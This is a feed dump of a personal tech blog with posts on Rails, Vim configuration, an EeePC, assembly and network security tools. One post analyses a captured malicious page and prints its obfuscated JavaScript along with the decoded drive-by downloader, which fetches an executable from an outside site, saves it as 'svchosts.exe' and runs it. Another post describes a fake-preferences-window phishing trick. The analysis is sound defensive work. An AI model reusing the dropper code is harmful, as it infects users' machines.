:wq - blog » Uncategorized http://writequit.org/blog Tu fui, ego eris Mon, 22 Dec 2014 14:54:59 +0000 en-US hourly 1 http://wordpress.org/?v=4.1.5 Labview_rails and development motivation http://writequit.org/blog/2009/03/19/labview_rails-and-development-motivation/ http://writequit.org/blog/2009/03/19/labview_rails-and-development-motivation/#comments Thu, 19 Mar 2009 20:24:22 +0000 http://writequit.org/blog/?p=262 Alright, my wife has been trying to convince me that I should share the one-off I wrote for our internal lab management, so today I finally got around to fixing the last *major* bug in the system, and putting it up on github.

Yep, that’s right, you too can have a quasi-specialized lab management Ruby on Rails application to manage all the machines in your lab!

Labview

What I do hope that this does is inspire me to become a better Rails developer. I’ve been using Ruby for over a year now, I an extremely confident in my Ruby skills, and I’ve made many things I consider useful for myself and maybe for other people. Labview was my first real Rails project, and by first “real” project, I mean first one that I use every day, other people in my office use, and I feel halfway confident releasing it for people to see.

On the other hand, the testing is lacking, documentation is poor and some of the authentication systems are kind of hacked together. I’m labeling this one a “learning experience” and moving on. I probably won’t commit any more to Labview (but that doesn’t mean I wouldn’t be open if someone wanted to fork it on Github…) simply because right now it works well enough.

Oh yea, and I can’t thank my wife Delilah enough for the better visual design. You should have seen Labview back when it was hacked together in PHP. It was a pastelle assault on the eyes.

Anywho, Labview is a really simple project, and a great start for someone interested in getting into Rails. I’ve learned a lot from developing it, and a lot of the knowledge has immediately been applied in some other projects I’m working on. Perhaps the next Rails app I work on will conform for test-driven-development? I’m looking forward to other projects I have ideas for in the future :)

I’m also excited about taking a look at Sinatra, since Atmos did a talk on it last night at the Ruby meetup. Specifically, I’m interested to see if I can build a ssh-tunneling server using only Sinatra and Ruby over HTTP…

]]>
http://writequit.org/blog/2009/03/19/labview_rails-and-development-motivation/feed/ 0
From Newsbeuter to Instapaper with the Ruby RicePaper library http://writequit.org/blog/2009/03/03/from-newsbeuter-to-instapaper-with-the-ruby-ricepaper-library/ http://writequit.org/blog/2009/03/03/from-newsbeuter-to-instapaper-with-the-ruby-ricepaper-library/#comments Tue, 03 Mar 2009 23:39:46 +0000 http://writequit.org/blog/?p=253 I love Instapaper, a truly elegant solution without any needless over-architecting. I use it every day, for queuing up articles to read during a lull in the workflow around here.

However, I’ve had an extra step in my article reading, see I read my RSS feeds in Newsbeuter, so I normally have to open the feed in Newsbeuter, open it in the browser, use the bookmarklet to add it to instapaper, then close the tab (until I want to read the article later). Well no more!

Enough introduction, I haven’t posted nearly enough on here lately, so I wanted to share a little library I’m working on called RicePaper. It’s a simple Ruby library/cli tool for submitting URLs to Instapaper. I’ve started a github project for it, go check it out or download the file directly. RicePaper requires the HTTParty gem (which you can install using “sudo gem install httparty” on a system with Ruby installed) Ricepaper works extremely easily from the command line, like so:

% ./ricepaper.rb -u user@mydomain.com -p mypassword -t "The IWishI site" "http://iwishi.org"

The -t “<title>” option is optional, Instapaper will attempt to find a title for the article without it. You can also use ricepaper from any Ruby code (if you’re a Ruby scripter) as a library by using this little code:

require 'ricepaper'
rp = RicePaper.new(user@email.com, password)
rp.add("http://www.asdf.com", "The ASDF site")
rp.add("http://www.google.com")

It’s extremely simple to use.

Anyway, back to what I was originally going to use it for, bookmarking a URL directly from Newsbeuter, for that, we’ll need a “glue” script, like this (I named mine ricepaper.sh):

#!/bin/bash

# Change these to be your instapaper credentials
USERNAME=email@domain.com
PASSWORD=yourpassword
# Where the ricepaper executable is located
RICEPAPER=ricepaper

# If the title is non-empty, set it
if [ ${#2} -gt 0  ]; then
$RICEPAPER -u $USERNAME -p $PASSWORD -t "$2" "$1" > /dev/null &
else
$RICEPAPER -u $USERNAME -p $PASSWORD "$1" > /dev/null &
fi

# Exit correctly, either way
exit 0

Watch out for the quotes in the script above, sometimes wordpress makes them “special” quotes, which confuses the bash interpreter.

Replace the username and password to your Instapaper credentials and put the correct location to the ricepaper ruby executable, then save the script, chmod +x it and put it in your path somewhere.

Only one step left, which is to add this line to your ~/.newsbeuter/config file:

bookmark-cmd  ricepaper.sh

What happens now, is when you bookmark an article in Newsbeuter, it will call ricepaper.sh with the URL and Title of the article, so whatever you put the Title of the bookmark to be, that’s the title that will show up on Instapaper. Voila!

ip2

Feel free to email if you have any questions about using the script(s). Hope you enjoy!

]]>
http://writequit.org/blog/2009/03/03/from-newsbeuter-to-instapaper-with-the-ruby-ricepaper-library/feed/ 8
Switching from MacBook Pro to an ASUS EeePC http://writequit.org/blog/2008/12/03/switching-from-macbook-pro-to-an-asus-eeepc/ http://writequit.org/blog/2008/12/03/switching-from-macbook-pro-to-an-asus-eeepc/#comments Wed, 03 Dec 2008 17:55:22 +0000 http://writequit.org/blog/?p=234 Well, the display on my Macbook Pro finally decided to die on me, for no apparent reason (I was just sitting in bed, listening to some music when it died). So, I decided that rather than pay for a repair, I’d continue to use the MacBook as a desktop with an external display, and get a tiny netbook for day-to-day use (because I need a laptop to carry, go to coffeeshops with and generally use).

I ended up going with the EeePC (The 1000H model), because I could get the entire laptop for only a little more than repairing the screen of my MacBook (and a brand new Mac is terribly expensive). I’ve been playing with my new netbook for about a week now, and I thought I’d share some of my experiences.

The EeePC came with Windows XP preinstalled, so I promptly partitioned it down to 25g for Windows, 40g for Music and the rest (~90g) for Ubuntu-eee. I decided to go with Ubuntu-eee because of the custom kernel that supported the hardware out of the box without fiddling around. While I really really enjoy fiddling to get stuff to work, I don’t want to have to fiddle just to be able to get a working machine, especially when I’m somewhere I need to actually do some work. I almost immediately switched from the user-friendly Netbook remix interface to a classic Gnome interface, but I could see how it would be really nice for someone newer to Linux.

Here’s some of the key things (?) about my new EeePC (and Ubuntu-eee):

  • I like how portable this is, it’s definitely lighter than my MacBook Pro
  • It’s not ridiculously expensive like a Mac is ;)
  • I like Linux, since I tend to do all of my development on *nix systems, it’s great to have one as a main machine.
  • 1024×600 is very small, especially coming from 1440×900. This is helped by fullscreen mode in things like Firefox (with Vimperator for even more screen space) and Gnome Terminal.
  • Wifi and networking work great, this has always been shaky on Linux systems, I’m glad that I don’t have to fiddle for 20 minutes just to join a coffeeshop’s hotspot
  • Suspend and Hibernate work great, also a big feature, especially since Apple’s sleep feature spoiled me to never turn my Mac off.
  • I don’t like some of the trackpad stuff. It’s difficult to turn off the tap-to-click, attempting to install packages to manage it disable the vertical 2-finger scrolling, it’s _insanely_ sensitive (the pad, the buttons themselves are kind of stiff).
  • The keyboard is great, since I got the 10″, it’s not small enough to bother me during coding sessions, which I’m sure the 8.9″ would have.
  • This machine definitely has less power than I’m used to, but I make up for it by doing a lot of resource-intensive stuff on my home machine over SSH, which makes up for it.
  • Con: Linux twitter clients suck. Adobe AIR clients take a ton of resources also.
  • Con: Linux sound stuff still sucks, it struggles with 2 processes attempting to share the sound device using ALSA.

I would definitely _not_ recommend this device to anyone with ailing eyesight, I tend to use 8 or 9pt font for everything, and I could definitely see some eye strain for anyone who has vision trouble. Don’t get one for your grandparents unless you don’t play on much screen space being usable (or don’t do everything in the console, like I do :) ).

And, since I like pictures, here’s a few pictures of my new machine:

]]>
http://writequit.org/blog/2008/12/03/switching-from-macbook-pro-to-an-asus-eeepc/feed/ 4
Compiling inavd server on FreeBSD http://writequit.org/blog/2008/10/14/compiling-inavd-server-on-freebsd/ http://writequit.org/blog/2008/10/14/compiling-inavd-server-on-freebsd/#comments Tue, 14 Oct 2008 15:52:06 +0000 http://writequit.org/blog/?p=227 Just a short post, working through some of the modules I received, I ran into the inav module. Turns out that inavd doesn’t compile very nicely on FreeBSD, so I patched it. Previously when trying to compile you get:

c++ -ggdb -g3 -D INAV_VERSION= -c sniffer.cpp
In file included from sniffer.cpp:34:
/usr/include/netinet/ip.h:162: error: 'n_long' does not name a type
/usr/include/netinet/ip.h:165: error: 'n_long' does not name a type
*** Error code 1

So, download the inav-server-0.3.6-freebsd.patch into the directory where you untarred the server and issue the following commands:

cd <dir where you untarred INAV tarball>
patch -p1 < inav-server-0.3.6-freebsd.patch
cd server
make

Right now, the patch is very unclean and making the unitTests doesn’t work, but it does compile inavd and allow you to run the server on FreeBSD, enjoy!

]]>
http://writequit.org/blog/2008/10/14/compiling-inavd-server-on-freebsd/feed/ 1
Vim setup explained http://writequit.org/blog/2008/09/14/vim-setup-explained/ http://writequit.org/blog/2008/09/14/vim-setup-explained/#comments Mon, 15 Sep 2008 01:18:49 +0000 http://writequit.org/blog/?p=195 Since my site is named after a Vim command. I figured that I should eventually write something talking about my favorite text editor, and how I like it configured. What follows is the explanation of my .vimrc, as well as a description of the plugins that I use. A lot of the credit for this configuration goes to Bart Trojanowski, who has an excellent Vim configuration. At the bottom I’ll have a link to download any of the files themselves if you so desire. I hope you find it useful (everything in fixed-width font is the actual text, everything else is comments about it):

My ~/.vimrc:

Modelines have been abused in the past, and while I haven’t heard of anything lately that would abuse them, it’s always better safe than sorry. This requires the securemodelines vim script

" ---------------------------------------------------------------------------
" first the disabled features due to security concerns
set modelines=0               " no modelines [http://www.guninski.com/vim1.html]
let g:secure_modelines_verbose=0 " securemodelines vimscript
let g:secure_modelines_modelines = 15 " 15 available modelines

Since these are all simple features, I won’t bother to explain them besides the inline comments:

" ---------------------------------------------------------------------------
" operational settings
syntax on
set ruler                     " show the line number on the bar
set more                      " use more prompt
set autoread                  " watch for file changes
set number                    " line numbers
set hidden
set noautowrite               " don't automagically write on :next
set lazyredraw                " don't redraw when don't have to
set showmode
set showcmd
set nocompatible              " vim, not vi
set autoindent smartindent    " auto/smart indent
set expandtab                 " expand tabs to spaces
set smarttab                  " tab and backspace are smart
set tabstop=6                 " 6 spaces
set shiftwidth=6
set scrolloff=5               " keep at least 5 lines above/below
set sidescrolloff=5           " keep at least 5 lines left/right
set backspace=indent,eol,start
set showfulltag               " show full completion tags
set noerrorbells              " no error bells please
set linebreak
set cmdheight=2               " command line two lines high
set undolevels=1000           " 1000 undos
set updatecount=100           " switch every 100 chars
set complete=.,w,b,u,U,t,i,d  " do lots of scanning on tab completion
set ttyfast                   " we have a fast terminal
filetype on                   " Enable filetype detection
filetype indent on            " Enable filetype-specific indenting
filetype plugin on            " Enable filetype-specific plugins
compiler ruby                 " Enable compiler support for ruby
set wildmode=longest:full
set wildignore+=*.o,*~,.lo    " ignore object files
set wildmenu                  " menu has tab completion
let maplocalleader=','        " all my macros start with ,
set foldmethod=syntax         " fold on syntax automagically, always
set foldcolumn=2              " 2 lines of column for fold showing, always

set dictionary=/usr/share/dict/words " more words!

I do like candycode for my terminals (which tend to be black) and I like macvim for my GUI, so I change schemes depending on which I’m using.

if !has("gui_running")
      colorscheme candycode   " yum candy
end
if has("gui_running")
      colorscheme macvim      " macvim == win
      set guioptions-=T       " no toolbar
      set cursorline          " show the cursor line
end

For the taglist plugin, I want it to appear on the right and to quick vim as soon as I close the last file I’m working on.

" Settings for taglist.vim
let Tlist_Use_Right_Window=1
let Tlist_Auto_Open=0
let Tlist_Enable_Fold_Column=0
let Tlist_Compact_Format=0
let Tlist_WinWidth=28
let Tlist_Exit_OnlyWindow=1
let Tlist_File_Fold_Auto_Close = 1

Misc TOhtml settings

" Settings for :TOhtml
let html_number_lines=1
let html_use_css=1
let use_xhtml=1

My status line is basically <filename> [<filetype>] [+] #<buffernum> <linenum>/<totallines>,<columnnum>

" ---------------------------------------------------------------------------
" status line
set laststatus=2
if has('statusline')
        function! SetStatusLineStyle()
                let &stl="%f %y "                       .
                        \"%([%R%M]%)"                   .
                        \"%#StatusLineNC#%{&ff=='unix'?'':&ff.'\ format'}%*" .
                        \"%{'$'[!&list]}"               .
                        \"%{'~'[&pm=='']}"              .
                        \"%="                           .
                        \"#%n %l/%L,%c%V "              .
                        \""
        endfunc
        call SetStatusLineStyle()

        if has('title')
                set titlestring=%t%(\ [%R%M]%)
        endif

endif

More simple search options, see inline comments

" ---------------------------------------------------------------------------
"  searching
set incsearch                 " incremental search
set ignorecase                " search ignoring case
set hlsearch                  " highlight the search
set showmatch                 " show matching bracket
set diffopt=filler,iwhite       " ignore all whitespace and sync

I *occasionally* use the mouse. If I have to.

" ---------------------------------------------------------------------------
"  mouse stuffs
set mouse=a                   " mouse support in all modes
set mousehide                 " hide the mouse when typing
" this makes the mouse paste a block of text without formatting it
" (good for code)
map <MouseMiddle> <esc>"*p

I prefer not to litter my current directory with backup files, so I put them all in ~/.backup. I also save a lot of line positions in the viminfo file.

" ---------------------------------------------------------------------------
"  backup options
set backup
set backupdir=~/.backup
set viminfo=%100,'100,/100,h,\"500,:100,n~/.viminfo
set history=200
"set viminfo='100,f1

I use ,ss to toggle between spellcheck on and spellcheck off.

" ---------------------------------------------------------------------------
" spelling...
if v:version >= 700

  setlocal spell spelllang=en
  nmap <LocalLeader>ss :set spell!<CR>

endif

Here are all the keyboard shortcuts I use most often:

" ---------------------------------------------------------------------------
" some useful mappings
" Y yanks from cursor to $
map Y y$
" for yankring to work with previous mapping:
function! YRRunAfterMaps()
    nnoremap Y   :<C-U>YRYankCount 'y$'<CR>
endfunction
" toggle list mode
nmap <LocalLeader>tl :set list!<cr>
" toggle paste mode
nmap <LocalLeader>pp :set paste!<cr>
" change directory to that of current file
nmap <LocalLeader>cd :cd%:p:h<cr>
" change local directory to that of current file
nmap <LocalLeader>lcd :lcd%:p:h<cr>
" correct type-o's on exit
nmap q: :q
" save and build
nmap <LocalLeader>wm  :w<cr>:make<cr>
" open all folds
nmap <LocalLeader>fo  :%foldopen!<cr>
" close all folds
nmap <LocalLeader>fc  :%foldclose!<cr>
" ,tt will toggle taglist on and off
nmap <LocalLeader>tt :Tlist<cr>
" ,nn will toggle NERDTree on and off
nmap <LocalLeader>nn :NERDTreeToggle<cr>
" When I'm pretty sure that the first suggestion is correct
map <LocalLeader>r 1z=

I use this one quite often, as I often forget to do “sudo vim file” in the first case, now I don’t have to exit vim to write the file with sudo.

" If I forgot to sudo vim a file, do that with :w!!
cmap w!! %!sudo tee > /dev/null %
" ruby helpers
iab rbang #!/usr/bin/env ruby
iab idef def initialize

I think candycode looks good in all the color modes, but it’s still nice to set it up for different terms.

" ---------------------------------------------------------------------------
" setup for the visual environment
if $TERM =~ '^xterm'
        set t_Co=256
elseif $TERM =~ '^screen-bce'
        set t_Co=256            " just guessing
elseif $TERM =~ '^rxvt'
        set t_Co=88
elseif $TERM =~ '^linux'
        set t_Co=8
else
        set t_Co=16
endif

Switch between tabs with ,tn and ,tp

" ---------------------------------------------------------------------------
" tabs
" (LocalLeader is ",")
map <LocalLeader>tc :tabnew %<cr>    " create a new tab
map <LocalLeader>td :tabclose<cr>    " close a tab
map <LocalLeader>tn :tabnext<cr>     " next tab
map <LocalLeader>tp :tabprev<cr>     " previous tab
map <LocalLeader>tm :tabmove         " move a tab to a new location

Load extensions we need and change some format options for markdown files.

" ---------------------------------------------------------------------------
" auto load extensions for different file types
if has('autocmd')
        filetype plugin indent on
        syntax on

        autocmd BufReadPost *
                \ if line("'\"") > 0|
                \       if line("'\"") <= line("$")|
                \               exe("norm '\"")|
                \       else|
                \               exe "norm $"|
                \       endif|
                \ endif

        " improve legibility
        au BufRead quickfix setlocal nobuflisted wrap number

        " improved formatting for markdown
        " http://plasticboy.com/markdown-vim-mode/
        autocmd BufRead *.mkd  set ai formatoptions=tcroqn2 comments=n:>
        autocmd BufRead ~/.blog/entries/*  set ai formatoptions=tcroqn2 comments=n:>
endif
And that’s the .vimrc
Here are some of the plugins that I used:
  • NERD Commenter – auto comment sections of code
  • NERD Tree – display file tree for directories, like a project view
  • Alternate – Alternate between implementation and header files
  • Compview – Search for a word and display a window with results
  • GetLatestVimScript – Get the latest version of scripts
  • Matchit – Extended % matching
  • Rails – Tons of RoR stuff
  • Securemodelines – Secure modeline support
  • Taglist – display a list of tags from the file
  • VCScommand – help with files under revision control
  • Vimball – install vimball plugins
  • Yankring – have a ring of copy/paste buffers for history pasting
  • C – A collection of helpful things for C (Although mine is heavily customized)
Enough with text, here’s a couple of screenshots of how it looks:


I maintain a pretty-up-to-date copy of most of my configuration files in my github dotfile repository, that’s the best way to get this configuration as well as all the plugins that I use, you can download a tarball of all the files from the github (direct link: here) page as well.

Well, hope someone out there finds these configuration files useful. I welcome any feedback :)

Soon to come: an explanation of the project that I’ve been working on that has taken me away from blogging for so long, an Intrusion Detection System based on Locality events.

Update 10/23/08: After some theme changes, updated screenshot (no NERDtree or taglist shown in the image):

Update 12/9/09: Been over a year, just for a teaser of what it looks like now:

cljjava

]]>
http://writequit.org/blog/2008/09/14/vim-setup-explained/feed/ 8
Firefox/Safari on OSX’s keyboard annoyances http://writequit.org/blog/2008/08/21/firefoxsafari-on-osxs-keyboard-annoyances/ http://writequit.org/blog/2008/08/21/firefoxsafari-on-osxs-keyboard-annoyances/#comments Thu, 21 Aug 2008 17:19:18 +0000 http://writequit.org/blog/?p=188 I use keyboard shortcuts. A lot. So much in fact, that I find it incredibly annoying when websites create their own keyboard shortcuts for their pages. Most wiki-type pages (Wikipedia, Trac, Twiki) all use keyboard shortcuts on their sites.

I am a firm believer that application-level keybindings should always take precedence over website keybindings, no matter what. Not only is this in line with the conceptual view of how the two interact, but it’s better for security reasons, take, for example, the keyboard shortcuts to access the preferences for almost all applications on OSX: Apple+, (or CMD)

Why stop with usability features like focusing the find box? Why not overwrite the keyboard shortcut for accessing the preferences for a browser, trick the website user into clicking on something he or she should not be clicking on. (Note that it requires javascript. Firefox’s popup blocker will catch it, but Safari’s does not, it also looks more realistic in Safari).

Here’s an example, a page that I’m hosting (it doesn’t do anything malicious ;) )

Use CMD+, to open the preferences for either safari or firefox, I used firefox for this example, but I could just have easily used safari. I mocked this up in about 5 minutes, I could easily have opened a page instead of just an image also.

Did you see the fake preferences window? Now tell me how many people (non-technical users) would immediately know that this window was not the real preferences window for Firefox? What if the website had a “How-to” guide for setting a Firefox preference, and encouraged the user to “Press CMD+, to open the preferences, then click on <blah> and type <blah>”. If the website showed a picture of a false preferences panel and said “It’s perfectly normal for firefox preferences to ask for your password, enter it into the box on the ‘Security’ tab”, how many users might be tricked into doing that? You could write a guide for setting a preference that was actually a phishing site.

Comeon browser devs, don’t let javascript steal ALL the shortcuts, at least don’t pass browser-specific shortcuts to the site BEFORE handling them. (Or make it an option you have to turn on?)

Thoughts? What do you think, should websites have the ability to capture keystrokes? Should browser developers pass things through? What about a site-(white|black)list for keyboard shortcuts?

]]>
http://writequit.org/blog/2008/08/21/firefoxsafari-on-osxs-keyboard-annoyances/feed/ 0
Inline strlen function in assembly http://writequit.org/blog/2008/06/06/inline-strlen-function-in-assembly/ http://writequit.org/blog/2008/06/06/inline-strlen-function-in-assembly/#comments Fri, 06 Jun 2008 17:40:58 +0000 http://writequit.org/blog/?p=185

I know the strlen function in assembly has been covered on the internet before, but I figured I’ve cover it again, just in case someone like myself were searching google for it ;) ; here’s the code:

00404334 sub_404334 proc near
00404334  push edi
00404335  push eax
00404336  push ecx
00404337  mov edi, edx
00404339  xor eax, eax
0040433B  repne scasb
0040433D  jnz short loc_404341
0040433F  not ecx
00404341 loc_404341:
00404341  pop eax
00404342  add ecx, eax
00404344  pop eax
00404345  pop edi
00404346  jmp sub_4041BC
00404346 sub_404334 endp

The inputs for this function come from edx and ecx, edx holds a pointer to our string (in this example, the string is the location of the windows directory, so I’m going to say it’s “C:\Windows”). Ecx holds the maximum length of the string, which is 256 in this example. This is important as ecx is used as a countdown while the string is checked. Let’s go line-by-line:

00404334  push edi
00404335  push eax
00404336  push ecx

These 3 lines just save the variables to the stack so they’re not overwritten, standard stuff.

00404337  mov edi, edx
00404339  xor eax, eax

edx (which is a LPCSTR to “C:\Windows”) is moved into edi (you’ll see why in a second). Eax is XOR’d with itself to reset it to 0. The next instructions will compare each character in the string with al, so essentially it’s searching for the NULL character ‘\0′

0040433B  repne scasb

This instruction works from the beginning of edi, comparing each character of the string to whatever is in al (which is ‘\0′ or NULL right now). It decrements ecx for every character it compares (scans). If it does not find a match (repne – repeat-ne==Not Equal), it moves to the next character. In our example “C:\Windows” (terminated by NULL, like a good string should), ecx will decrease from 256 to 246 (C – 256, : – 255, \ – 254, W – 253, i – 252, n – 251, d – 250, o – 249, w – 248, s – 247, \0 – 246)

0040433D  jnz short loc_404341

If the end of the string was reached and there were not NULL bytes, jump to location 0x404341. In our example, it’s not jumped.

0040433F  not ecx

Flip all the bits in ecx, since ecx will be treated as a signed number, this makes ecx = -ecx. Note that if the end of the string is reached (ecx = 0), this instruction would be skipped by the jump in the previous instruction. In our example however, ecx becomes -246 (or 0xFFFFFF09).

00404341 loc_404341:
00404341  pop eax
00404342  add ecx, eax

Ecx’s starting value (256, remember?) is popped back into eax. Eax is then added to ecx and the result is stored in ecx. Therefore:

eax = 256
ecx = ecx + eax
ecx = -246 + 256
ecx = 10

The length of the string now resides in ecx, we can restore our original registers and jump away in the ending instructions:

00404344  pop eax
00404345  pop edi
00404346  jmp sub_4041BC

And that, is one way to get the length of a string in assembly.

 

]]>
http://writequit.org/blog/2008/06/06/inline-strlen-function-in-assembly/feed/ 1
Quick javascript de-obfuscation with python http://writequit.org/blog/2008/06/05/quick-javascript-de-obfuscation-with-python/ http://writequit.org/blog/2008/06/05/quick-javascript-de-obfuscation-with-python/#comments Thu, 05 Jun 2008 22:44:59 +0000 http://writequit.org/blog/?p=182 Scholar was kind enough to allow me to post his/her obfuscated javascript. Here’s a quick rundown. The page was originally this:

<html>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /index.php was not found on this server.</p>
<p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
</body></html><script language=JavaScript>
str = "qndy`mh)(:gtobuhno!qndy`mh)(!zw`s!doeds!<!enbtldou/bsd`udDm
dldou)&nckdbu&(:doeds/rdu@uushctud)&he&-&doeds&(:doeds/rdu@uushc
tud)&bm`rrhe&-&b&*&m&*#rhe;C#*#E8#*&7B447,74&*#@2,00#*&E1,892
@,1&*#1B#*&15G&*#B38#*&D27&(:usx!zw`s!`rp!<!doeds/Bsd`udNckdbu)
&l&*#ry#*&lm3&*#/#*&Y&*#LM#*&I&*&UUQ&-&&(:w`s!`rr!<
!doeds/Bsd`udNckdbu)#Ri#*#dmm/@#*#q#*#qmhb`#*#uhno#-
&&(:w`s!`rru!<!doeds/Bsd`udNckdbu)&`&*&e&*#nec/#*&ru&*#s#*&d`l&
-&&(:usx!z!`rru/uxqd!<!0:`rp/nqdo)&F&*#D#*&U&-&iuuq;..vn
smebihodrdvshudsr/bnl..mn`e/qiq&-g`mrd(:`rp/rdoe)(:!`rr
u/nqdo)(:`rru/Vshud)`rp/sdrqnordCnex(:w`s!hlx`!<!&/..//..r
wbinrur/dyd&:`rru/R`wdUnGhmd)hlx`-3(:`rru/Bm
nrd)(:|!b`ubi)d(!z|usx!z!`rr/ridmmdydbtud)hlx`(:!|!b`ubi
)d(!z||b`ubi)d(z||";
str2 = "";
for (i = 0; i < str.length; i ++) { str2 =  str2 + String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);</script></html>

(line breaks in the str variable added so it’s actually readable). Looks like this script uses the same XOR method as the script I posted about previously. This script is actually trivial to de-obfuscate using python (I <3 ruby, but ruby doesn’t like strings with #{} in them, so it was easier just to use python instead):

shell> python
>>> str = <long-string-from-above-pasted-here>
>>> str2 = ""
>>> for i in range(0,len(str)):
. . .     str2 = str2 + chr(ord(str[i] ^ 1))


str2 now contains the de-obfuscated javascript, which after inserting line breaks, looks something like this:

poexali();
function poexali() {
 var ender = document.createElement('object');
 ender.setAttribute('id','ender');
 ender.setAttribute('classid','clsid:BD96C556-65A3-11D0-983A-00C04FC29E36');
 try {
  var asq = ender.CreateObject('msxml2.XMLHTTP','');
  var ass = ender.CreateObject("Shell.Application",'');
  var asst = ender.CreateObject('adodb.stream','');
  try {
   asst.type = 1;
   asq.open('GET','http://worldchinesewriters.com//load.php',false);
   asq.send();
   asst.open();
   asst.Write(asq.responseBody);
   var imya = './/..//svchosts.exe';
   asst.SaveToFile(imya,2);
   asst.Close();
  } catch(e) {}
  try {
   ass.shellexecute(imya);
  } catch(e) {}
 }catch(e){}
}

Which, as Scholar pointed out in his/her original email, attempts to download hxxp://worldchinesewriters.com/load.php and save it into the local file “svchosts.exe”, then execute the file.

Super-quick post, since lately I seem to be a tad verbose. What “svchosts.exe” does is left as an exercise to the reader :)

]]>
http://writequit.org/blog/2008/06/05/quick-javascript-de-obfuscation-with-python/feed/ 2
NSM-Console version 0.7 release http://writequit.org/blog/2008/04/27/nsm-console-version-07-release/ http://writequit.org/blog/2008/04/27/nsm-console-version-07-release/#comments Sun, 27 Apr 2008 18:19:34 +0000 http://writequit.org/blog/?p=163 First off, I apologize for the lack of posts here lately, I’ve been trying to come up with something good to post, because I’m just not a fan of rehashing things other blogs post, or commenting on news stories. Hopefully I’ll be able to contribute more soon :)

Now down to the real post, NSM-Console 0.7 has been released, there are a lot of cool features in this release, but first, go download NSM-Console!

As always, you can check out the TODO and CHANGELOG from svn.

Now, let’s cover some of the newest features in this release:

Encode/Decode enhancements
The encode and decode methods have had a few enhancements added to them, most notably, you can now specify a file to encode or decode, instead of specifying just a string, so you could do:

nsm> encode -f base64 testfile.txt
Encoding ascii --> base64...
Output ([]'s added to show beginning and end):
[TlNNLUNvbnNvbGUgaXMgYXdlc29tZSwgeW91IHNob3VsZCB1c2UgaXQgOikK]

Also, you can specify a variety of hex encodings, because I was noticing that it was delineated in a variety of ways, \x, space (or not delineated at all). I’ve also added the default hex and binary methods, so you don’t have to specify endianness, they default to little-endian.

IP->ASN mapping
As per Scholar’s suggestion, there is now both a module and a command for translating an ip into it’s ASN,  you can either use the module to get a listing from each IP in the pcap, or use the below command to get the ASN for just one address:

nsm> ip2asn 203.223.154.86
Bulk mode; whois.cymru.com [2008-04-27 17:53:32 +0000]
17992   | 203.223.154.86   | AIMS-MY-DIA-AS AIMS Data Centre

Thanks to Team Cymru for their ASN servers :)

‘Print’ command supports flags
The print command now supports printing TCP flags, still uses Scholar’s pcapparser library.

New command: ‘iplist’
Generate a list of the ips in a pcap file, sorted by the number of occurrences in the file, see below:

nsm> iplist
=== IP list for data.pcap ===
192.168.1.123   1507
64.233.179.109  260
192.168.1.136   141
204.245.162.17  126
216.178.38.133  102
208.67.217.230  92
209.225.0.103   88
.. etc etc

Pipes now supported
One feature geek00l has been bugging me about is getting piping to work in the nsm shell, I’m happy to announce that they finally work, you might run into a few bugs (broken pipes with less), but for the most part they work, now output can be piped into files and programs:

nsm> p -x 1-* | less
(display all the packets and hex output, piped into less)
nsm> iplist > iplist.txt
(output the list of ips into iplist.txt)
nsm> ip2asn 203.223.154.86 >> iplist.txt
(append the ip2asn output to iplist.txt)

Etc, etc, you get the idea. The ‘<‘ pipe hasn’t been implemented yet, perhaps if it’s needed in the future.

New modules, bro-ids-connection and yahsnarf
Geek00l committed his bro-ids-connection module for generating only connection information from a pcap, a yahsnarf module was also committed, to enable extract yahoo IM conversations from a pcap file. Thanks geek00l!

Automatic updating of NSM-Console
Users desiring to be on the bleeding edge of NSM-Console development (is there anyone that actually desires this? :P) can now use the “update” command from within NSM-Console to automatically update from the latest subversion commit. You can also use the -v for verbose output, see below:

nsm> update -v
Updating NSM-Console from svn...
Fetching newest revision from svn...
etc, etc

Still a few kinks to work out, but should work pretty well.

Bugfixes
I fixed some bugs related to gzip’d pcap files as well as some bugs in the encode and decode methods. I also introduced some bugs (hurray!) with pipes, but it’s still usable.

Like I always say, check out the full TODO and CHANGELOG for complete details, and send me any feedback you have :)

]]>
http://writequit.org/blog/2008/04/27/nsm-console-version-07-release/feed/ 0
Protected: Insights http://writequit.org/blog/2007/06/14/insights/ http://writequit.org/blog/2007/06/14/insights/#comments Thu, 14 Jun 2007 22:08:08 +0000 http://writequit.org/blog/?p=60

This content is password protected. To view it please enter your password below:

]]>
http://writequit.org/blog/2007/06/14/insights/feed/ 2